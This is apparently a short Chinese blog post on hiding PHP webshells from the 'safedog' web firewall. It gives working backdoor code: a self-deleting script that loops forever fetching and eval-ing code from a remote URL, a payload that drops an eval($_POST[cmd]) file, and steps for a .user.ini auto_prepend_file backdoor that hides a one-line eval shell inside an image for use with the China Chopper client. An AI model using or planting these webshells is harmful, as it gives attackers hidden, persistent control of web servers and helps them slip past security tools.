过狗一句话超强隐藏

<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://xxx/xxx.txt';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>

txt文本： file_put_contents('./1.php',"<?php @eval($_POST[cmd])'"?>");
参考链接：捡了一个非常淫荡的PHP后门，给跪了

user.ini后门，需要安装fpm(fastcgi的一种)或fastcgi，实测可用

1、需要必须是（.user.ini）；内容：auto_prepend_file=1.gif  其他可用注释符（;）而非（‘#’ 已弃用）
2、1.gif  内容：一句话（<?php @eval($_POST[value]);?>）还可以是jpg;不可以是png
3、和正常PHP文件（随意）     
注：.user.ini必须和正常的PHP文件是同一目录，才能连菜刀，这个PHP文件即菜刀URL中的PHP文件

注意一个问题：我写的，链接
 利用PHP的.user.ini设置文件建造后门

菜刀url中不能使用 /.../ 类似上级目录法（好像本身就有问题哈，嘿嘿）

最后编辑于：2018.01.23 15:24:55

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成，浏览时请结合常识与多方信息审慎甄别。
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

过狗一句话超强隐藏

菜刀url中不能使用 /.../ 类似上级目录法（好像本身就有问题哈，嘿嘿）

友情链接更多精彩内容